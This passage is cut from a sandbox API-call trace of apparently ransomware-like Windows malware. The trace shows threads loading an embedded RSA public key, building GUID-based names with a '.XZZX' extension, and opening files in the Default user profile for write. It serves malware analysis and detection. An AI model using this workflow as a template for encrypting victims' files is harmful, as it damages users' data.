Data4=([0]=0x9a, [1]=0x23, [2]=0x41, [3]=0x6e, [4]=0x29, [5]=0xb8, [6]=0x9d, [7]=0xe5))) returned 0x0 [0134.760] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0134.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0134.760] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\5F9FD8BA0E678CC1A943F2F212887109.XZZX") returned 58 [0134.760] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="XZZX") returned 0x0 [0134.760] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x20) returned 0 [0134.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 466 os_tid = 0xa98 [0134.915] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.915] lstrcpyW (in: lpString1=0x420f460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0134.915] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.915] SetErrorMode (uMode=0x1) returned 0x1 [0134.915] lstrcpyW (in: lpString1=0x420f860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0134.915] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xeb715e02, Data2=0xd56e, Data3=0x451b, Data4=([0]=0x86, [1]=0x54, [2]=0xb1, [3]=0xa1, [4]=0x4e, [5]=0x62, [6]=0x6d, [7]=0x69))) returned 0x0 [0134.915] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0134.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0134.915] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\7DEE0EDC399D289AEB715E023DBE0CE2.XZZX") returned 58 [0134.915] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="XZZX") returned 0x0 [0134.915] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x20) returned 0 [0134.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 467 os_tid = 0xa9c [0135.072] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0135.072] lstrcpyW (in: lpString1=0x420f460, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0135.072] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0135.072] SetErrorMode (uMode=0x1) returned 0x1 [0135.072] lstrcpyW (in: lpString1=0x420f860, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0135.072] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x5ab93655, Data2=0x72ab, Data3=0x469f, Data4=([0]=0xb5, [1]=0xcf, [2]=0xbc, [3]=0x36, [4]=0x4a, [5]=0xc2, [6]=0x9b, [7]=0xa3))) returned 0x0 [0135.072] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0135.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0135.072] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\13E924C71FA1FA355AB9365523C2DE7D.XZZX") returned 58 [0135.072] StrStrW (lpFirst="ntuser.ini", lpSrch="XZZX") returned 0x0 [0135.072] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini", dwFileAttributes=0x20) returned 0 [0135.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 468 os_tid = 0xaa0 [0135.238] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0135.238] lstrcpyW (in: lpString1=0x420f460, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0135.238] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0135.238] SetErrorMode (uMode=0x1) returned 0x1 [0135.238] lstrcpyW (in: lpString1=0x420f860, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0135.238] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xbe98ee22, Data2=0xd57a, Data3=0x433f, Data4=([0]=0xbb, [1]=0x85, [2]=0xb0, [3]=0xaa, [4]=0x87, [5]=0xce, [6]=0xae, [7]=0xeb))) returned 0x0 [0135.238] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0135.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0135.238] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\1303C63438137706BE98EE223C345B4E.XZZX") returned 67 [0135.238] StrStrW (lpFirst="Administrator.contact", lpSrch="XZZX") returned 0x0 [0135.238] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact", dwFileAttributes=0x20) returned 0 [0135.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 469 os_tid = 0xaa4 [0135.383] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0135.383] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0135.383] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0135.383] SetErrorMode (uMode=0x1) returned 0x1 [0135.383] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0135.383] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x333364b, Data2=0x73d2, Data3=0x4d80, Data4=([0]=0xbe, [1]=0x6d, [2]=0x1b, [3]=0x11, [4]=0xde, [5]=0xe5, [6]=0x96, [7]=0xb2))) returned 0x0 [0135.383] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0135.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0135.384] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\A1663A86231013000333364B2730F748.XZZX") returned 67 [0135.384] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0135.384] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini", dwFileAttributes=0x20) returned 0 [0135.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 470 os_tid = 0xab0 [0135.921] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0135.921] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0135.921] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\") returned="\\\\?\\C:\\Users\\Default\\Documents\\" [0135.921] SetErrorMode (uMode=0x1) returned 0x1 [0135.921] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0135.921] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xd9e2eaaa, Data2=0x6e6d, Data3=0x4118, Data4=([0]=0xb3, [1]=0x9e, [2]=0xd3, [3]=0xcf, [4]=0x1e, [5]=0x20, [6]=0xa3, [7]=0x51))) returned 0x0 [0135.921] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0135.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0135.922] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Documents\\4672F6621C140738D9E2EAAA2034EB80.XZZX") returned 68 [0135.922] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0135.922] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini", dwFileAttributes=0x20) returned 0 [0135.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 471 os_tid = 0xab4 [0136.053] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.053] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0136.053] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\") returned="\\\\?\\C:\\Users\\Default\\Downloads\\" [0136.053] SetErrorMode (uMode=0x1) returned 0x1 [0136.053] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0136.053] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa0ce5e14, Data2=0xe219, Data3=0x4b4c, Data4=([0]=0xa7, [1]=0x61, [2]=0xb5, [3]=0x9e, [4]=0x5d, [5]=0x2f, [6]=0xbe, [7]=0xe3))) returned 0x0 [0136.053] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0136.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0136.053] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Downloads\\E334D7F44280726CA0CE5E1446A156B4.XZZX") returned 68 [0136.053] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0136.053] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini", dwFileAttributes=0x20) returned 0 [0136.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 472 os_tid = 0xab8 [0136.198] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.198] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0136.198] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\" [0136.199] SetErrorMode (uMode=0x1) returned 0x1 [0136.199] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0136.199] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xe2613d33, Data2=0x899f, Data3=0x4740, Data4=([0]=0x9d, [1]=0x2d, [2]=0x5c, [3]=0x65, [4]=0x91, [5]=0xd0, [6]=0xe0, [7]=0x18))) returned 0x0 [0136.199] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0136.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0136.199] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\A4254DAD264D80C0E2613D332A6E6508.XZZX") returned 68 [0136.199] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0136.199] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini", dwFileAttributes=0x20) returned 0 [0136.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 473 os_tid = 0xabc [0136.358] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.358] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0136.358] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" 